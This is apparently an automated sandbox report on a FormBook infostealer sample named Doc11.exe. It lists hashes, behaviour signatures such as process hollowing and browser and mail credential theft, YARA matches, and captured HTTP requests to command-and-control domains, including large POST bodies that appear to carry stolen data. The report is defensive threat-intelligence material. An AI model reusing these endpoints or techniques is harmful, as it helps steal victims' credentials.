Analysis Report Doc11.exe

Overview

General Information

Sample Name: Doc11.exe
Analysis ID: 288546
MD5: f7ad3b59548788a59172b6477a1b83f0
SHA1: 3b042b49ac135f38824de3665a051a7631e98782
SHA256: f22a0b5b12687ae12b9f4d625d82a16562bce5e1b03b7d7372df3813e5afc8e5
Tags: FormBook

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Creates an undocumented autostart registry key
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: Doc11.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: Doc11.exe Virustotal: Detection: 34% Perma Link
Source: Doc11.exe ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Doc11.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.RegAsm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.Doc11.exe.6320000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then pop edi 2_2_00416C41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4x nop then pop edi 6_2_00B16C51

Networking:

barindex
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /dfc/?D8P=3+M06F3PIg4yWAePafKrbwLCVt/5XonsK6D9R8t918UDHllTjs2fMYDw+G4H15oZP3Dg&qL0=gjqP-lQha6A HTTP/1.1Host: www.chelsescompass.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dfc/?D8P=9M3+mrw2yCLpvsjtVt4xmWYaRC63IF9WI6ouro4nLgjTYgR16zyhTX9CTsO+/cCnLtWf&qL0=gjqP-lQha6A HTTP/1.1Host: www.snacklabbet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: LOOPIASE LOOPIASE
Source: Joe Sandbox View ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /dfc/ HTTP/1.1Host: www.snacklabbet.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.snacklabbet.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.snacklabbet.com/dfc/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 44 38 50 3d 31 75 37 45 34 50 42 42 39 56 61 63 36 2d 48 6c 56 36 31 62 6e 54 5a 67 56 78 57 57 59 6c 68 66 63 74 68 32 77 49 38 63 47 53 28 31 49 6b 5a 77 77 52 50 31 54 53 4d 45 52 64 43 35 74 35 36 52 57 59 66 64 67 6a 65 30 6c 73 78 76 34 55 31 6e 44 2d 63 4b 43 44 52 46 55 31 47 34 65 52 4f 43 4d 43 31 6b 4a 76 45 4f 53 4a 43 39 4f 75 38 51 7a 62 45 33 32 70 4b 32 6d 34 48 77 63 57 4e 4f 65 49 7a 75 48 39 69 6b 73 74 4f 72 78 4f 59 74 76 5a 72 38 34 50 70 49 78 74 72 55 6b 7a 65 72 53 64 57 4d 34 49 56 65 48 64 33 73 4b 65 65 4e 51 53 61 77 68 79 50 70 38 75 75 71 7e 49 49 78 38 35 4e 5f 53 6e 37 52 52 4b 67 56 28 6f 7e 38 49 4e 70 41 50 41 4b 62 6b 51 55 33 4f 37 43 42 46 77 4d 57 74 43 63 70 53 39 6e 44 47 5a 32 6f 33 72 41 6c 34 78 4a 30 55 35 6f 7a 49 76 31 59 5a 45 7e 61 63 5f 56 5a 67 34 61 5f 56 72 54 35 62 61 72 69 6f 37 7e 73 47 58 48 78 70 41 57 6c 59 4e 41 74 34 7a 67 5f 45 6f 61 61 35 4e 72 2d 6e 74 38 68 4f 6a 62 6f 42 78 6e 30 55 41 46 46 59 52 73 55 51 6e 44 61 4e 55 32 4b 4d 4e 43 71 5a 36 64 54 45 36 66 6a 58 6c 64 4a 74 33 33 48 47 48 50 49 64 55 53 41 62 51 52 6d 75 74 51 71 46 53 33 6b 58 6b 73 36 57 66 30 51 55 39 57 76 28 41 28 44 4f 57 51 6e 6f 5f 53 6e 6e 76 30 38 79 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: D8P=1u7E4PBB9Vac6-HlV61bnTZgVxWWYlhfcth2wI8cGS(1IkZwwRP1TSMERdC5t56RWYfdgje0lsxv4U1nD-cKCDRFU1G4eROCMC1kJvEOSJC9Ou8QzbE32pK2m4HwcWNOeIzuH9ikstOrxOYtvZr84PpIxtrUkzerSdWM4IVeHd3sKeeNQSawhyPp8uuq~IIx85N_Sn7RRKgV(o~8INpAPAKbkQU3O7CBFwMWtCcpS9nDGZ2o3rAl4xJ0U5ozIv1YZE~ac_VZg4a_VrT5bario7~sGXHxpAWlYNAt4zg_Eoaa5Nr-nt8hOjboBxn0UAFFYRsUQnDaNU2KMNCqZ6dTE6fjXldJt33HGHPIdUSAbQRmutQqFS3kXks6Wf0QU9Wv(A(DOWQno_Snnv08yw).
Source: global traffic HTTP traffic detected: POST /dfc/ HTTP/1.1Host: www.snacklabbet.comConnection: closeContent-Length: 185341Cache-Control: no-cacheOrigin: http://www.snacklabbet.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.snacklabbet.com/dfc/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 44 38 50 3d 31 75 37 45 34 4c 38 34 75 46 58 45 77 73 6a 6d 48 36 6c 54 32 43 6f 2d 52 7a 53 46 4a 33 42 74 56 61 78 6d 77 4a 73 59 4b 7a 76 6a 66 30 4a 77 32 53 6e 75 55 79 4d 48 41 4e 43 6d 36 4a 7e 74 4b 34 48 56 67 6d 6e 54 6c 73 70 73 68 43 59 74 43 75 64 54 44 6a 74 58 57 31 53 64 65 54 36 33 4d 6b 74 4b 66 66 41 4f 66 5a 4b 5f 43 76 73 4c 36 5f 55 47 6f 4b 75 33 6b 39 54 70 66 6d 67 35 63 71 50 32 50 66 47 71 39 75 53 65 76 66 6f 42 6c 6f 7a 33 32 5f 74 4c 74 65 57 51 38 30 4f 6e 54 65 4f 36 37 4e 35 64 4b 4e 76 69 4e 63 48 6e 56 6d 69 4a 6e 68 57 59 38 76 33 53 6c 70 30 64 75 4c 70 4e 51 53 54 6f 44 59 51 58 37 62 48 68 4d 4c 55 32 66 77 61 30 38 68 6b 73 59 34 47 55 41 31 49 47 6e 44 55 34 55 4d 72 78 53 62 75 63 30 34 74 6f 33 56 4e 62 41 71 4a 7a 47 65 55 62 4e 6e 54 35 52 5f 55 51 69 34 61 72 65 49 61 4f 63 72 76 39 76 36 50 4d 46 51 6a 63 73 41 79 41 56 72 41 70 32 79 6f 69 42 59 57 57 32 65 44 73 6a 50 77 71 49 51 48 75 66 42 6e 6e 55 43 74 61 59 52 73 32 51 69 28 67 4e 6c 53 4b 4e 59 4f 44 61 62 64 50 43 36 65 68 52 30 74 48 6d 6c 6a 75 47 48 58 49 50 55 44 49 5a 6e 74 6d 6b 66 49 72 46 32 62 6b 62 30 73 36 5a 5f 31 53 59 6f 6d 71 7a 43 4b 4d 45 6b 68 67 38 71 50 71 6c 2d 64 6d 6c 44 54 76 6c 73 48 7a 6b 37 44 73 6c 4b 35 65 64 6f 6a 4d 53 39 4e 73 5a 53 76 67 78 6f 51 38 7a 5a 65 77 68 39 74 34 76 4b 58 46 31 4d 76 74 6c 6b 35 36 28 4b 41 35 36 70 61 55 54 37 32 4b 44 6c 50 47 41 42 79 31 62 39 30 56 38 73 6e 6e 65 39 7e 6e 36 66 28 41 75 58 28 4f 57 69 68 5f 4d 37 66 73 47 6b 7a 4d 4a 6c 73 74 77 4c 6d 5a 66 49 61 67 4c 71 6c 4b 62 4c 7e 4b 63 48 6a 69 62 75 51 4f 4e 55 74 37 30 36 6f 41 45 73 4e 51 34 69 48 53 30 2d 62 51 28 37 56 44 62 42 35 4d 4a 4e 6d 78 70 58 47 48 55 66 6b 65 4a 75 67 62 51 46 58 49 7a 30 51 4d 6e 63 49 31 52 75 69 59 76 36 65 76 6f 70 54 35 51 52 52 30 48 2d 44 43 50 42 67 65 62 34 30 7a 62 79 50 4f 37 47 78 75 4d 43 48 69 41 35 4c 53 39 37 43 72 30 67 4d 42 7a 55 4e 71 67 31 4e 42 52 53 48 62 7e 68 28 56 63 68 7e 2d 76 37 30 36 7e 39 68 65 6c 48 6b 62 61 77 7e 65 6e 33 6f 2d 57 5a 63 4a 73 47 63 72 4b 48 67 67 68 55 74 44 33 35 47 53 7e 5f 4e 53 54 65 68 5a 72 51 68 7a 32 4f 38 30 68 61 57 37 69 62 53 71 52 43 61 51 64 69 55 64 76 71 5a 4a 6a 78 4e 4c 76 6a 47 4d 4f 36 71 4a 47 70 63 4a 52 63 69 77 30 6f 30 77 46 6c 52 6b 43 38 36 5f 67 4f 65 32 68 57 76 57 79 34 4b 4e 54 72 4d 56 6c 5a 36 6f 41 78 7e 6f 5a 66 34 58 6b 39 38 58 62 73 45 6e 47 67 4b 47 55 4d 65 5a 50 46 63 4d 38 5f 53 70 78 49 42 6f 31 6d 56 6b 66 61 68 79 36 4f 58 30 68 6a 30 68 38 41 77 31 64 43 4b 36 6c 6f 54 67 4f 4e 51 64 7e 64 6b 7
Source: global traffic HTTP traffic detected: GET /dfc/?D8P=3+M06F3PIg4yWAePafKrbwLCVt/5XonsK6D9R8t918UDHllTjs2fMYDw+G4H15oZP3Dg&qL0=gjqP-lQha6A HTTP/1.1Host: www.chelsescompass.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dfc/?D8P=9M3+mrw2yCLpvsjtVt4xmWYaRC63IF9WI6ouro4nLgjTYgR16zyhTX9CTsO+/cCnLtWf&qL0=gjqP-lQha6A HTTP/1.1Host: www.snacklabbet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.chelsescompass.com
Source: unknown HTTP traffic detected: POST /dfc/ HTTP/1.1Host: www.snacklabbet.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.snacklabbet.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.snacklabbet.com/dfc/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 44 38 50 3d 31 75 37 45 34 50 42 42 39 56 61 63 36 2d 48 6c 56 36 31 62 6e 54 5a 67 56 78 57 57 59 6c 68 66 63 74 68 32 77 49 38 63 47 53 28 31 49 6b 5a 77 77 52 50 31 54 53 4d 45 52 64 43 35 74 35 36 52 57 59 66 64 67 6a 65 30 6c 73 78 76 34 55 31 6e 44 2d 63 4b 43 44 52 46 55 31 47 34 65 52 4f 43 4d 43 31 6b 4a 76 45 4f 53 4a 43 39 4f 75 38 51 7a 62 45 33 32 70 4b 32 6d 34 48 77 63 57 4e 4f 65 49 7a 75 48 39 69 6b 73 74 4f 72 78 4f 59 74 76 5a 72 38 34 50 70 49 78 74 72 55 6b 7a 65 72 53 64 57 4d 34 49 56 65 48 64 33 73 4b 65 65 4e 51 53 61 77 68 79 50 70 38 75 75 71 7e 49 49 78 38 35 4e 5f 53 6e 37 52 52 4b 67 56 28 6f 7e 38 49 4e 70 41 50 41 4b 62 6b 51 55 33 4f 37 43 42 46 77 4d 57 74 43 63 70 53 39 6e 44 47 5a 32 6f 33 72 41 6c 34 78 4a 30 55 35 6f 7a 49 76 31 59 5a 45 7e 61 63 5f 56 5a 67 34 61 5f 56 72 54 35 62 61 72 69 6f 37 7e 73 47 58 48 78 70 41 57 6c 59 4e 41 74 34 7a 67 5f 45 6f 61 61 35 4e 72 2d 6e 74 38 68 4f 6a 62 6f 42 78 6e 30 55 41 46 46 59 52 73 55 51 6e 44 61 4e 55 32 4b 4d 4e 43 71 5a 36 64 54 45 36 66 6a 58 6c 64 4a 74 33 33 48 47 48 50 49 64 55 53 41 62 51 52 6d 75 74 51 71 46 53 33 6b 58 6b 73 36 57 66 30 51 55 39 57 76 28 41 28 44 4f 57 51 6e 6f 5f 53 6e 6e 76 30 38 79 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: D8P=1u7E4PBB9Vac6-HlV61bnTZgVxWWYlhfcth2wI8cGS(1IkZwwRP1TSMERdC5t56RWYfdgje0lsxv4U1nD-cKCDRFU1G4eROCMC1kJvEOSJC9Ou8QzbE32pK2m4HwcWNOeIzuH9ikstOrxOYtvZr84PpIxtrUkzerSdWM4IVeHd3sKeeNQSawhyPp8uuq~IIx85N_Sn7RRKgV(o~8INpAPAKbkQU3O7CBFwMWtCcpS9nDGZ2o3rAl4xJ0U5ozIv1YZE~ac_VZg4a_VrT5bario7~sGXHxpAWlYNAt4zg_Eoaa5Nr-nt8hOjboBxn0UAFFYRsUQnDaNU2KMNCqZ6dTE6fjXldJt33HGHPIdUSAbQRmutQqFS3kXks6Wf0QU9Wv(A(DOWQno_Snnv08yw).
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: cscript.exe, 00000006.00000002.445011473.0000000005269000.00000004.00000001.sdmp String found in binary or memory: http://www.snacklabbet.com
Source: cscript.exe, 00000006.00000002.445011473.0000000005269000.00000004.00000001.sdmp String found in binary or memory: http://www.snacklabbet.com/dfc/
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.213355598.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: https://static.loopia.se/responsive/images/extra_pages/parking-skylt.png
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: https://static.loopia.se/responsive/images/extra_pages/website.svg
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: https://static.loopia.se/responsive/images/footer/logo-grey.png
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: https://static.loopia.se/responsive/js/respond-js/respond.src.js
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: https://static.loopia.se/responsive/styles/extra-pages-alt.css
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: cscript.exe, 00000006.00000002.445644709.00000000055DF000.00000004.00000001.sdmp String found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Detected FormBook malware
Source: C:\Windows\SysWOW64\cscript.exe Dropped file: C:\Users\user\AppData\Roaming\7L8580B-\7L8logri.ini Jump to dropped file
Source: C:\Windows\SysWOW64\cscript.exe Dropped file: C:\Users\user\AppData\Roaming\7L8580B-\7L8logrv.ini Jump to dropped file
Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
